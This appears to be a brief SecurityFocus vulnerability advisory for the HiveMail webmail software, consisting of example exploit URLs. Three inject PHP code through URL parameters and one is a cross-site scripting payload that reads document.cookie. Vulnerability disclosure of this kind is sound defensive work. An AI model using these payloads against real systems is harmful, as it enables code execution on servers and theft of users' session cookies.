Multiple HiveMail Vulnerabilities


The following examples have been provided:

http:///www.example.com/addressbook.update.phpcmd=remove&contactgroupid=1%20--%20");phpinfo();@ob_start("&submit=1&contactcheck[]=1&con
tactcheck[]=2

http://www.example.com/addressbook.add.php?cmd=quick&messageid=1");phpinfo();@ob_start("&popid=1&msgid=1

http://www.example.com/folders.update.php?cmd=mark&folderid=0%20--%20%22);phpinfo();@ob_start(%22


http://www.example.com/index.php/%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E


 

Privacy Statement
Copyright 2010, SecurityFocus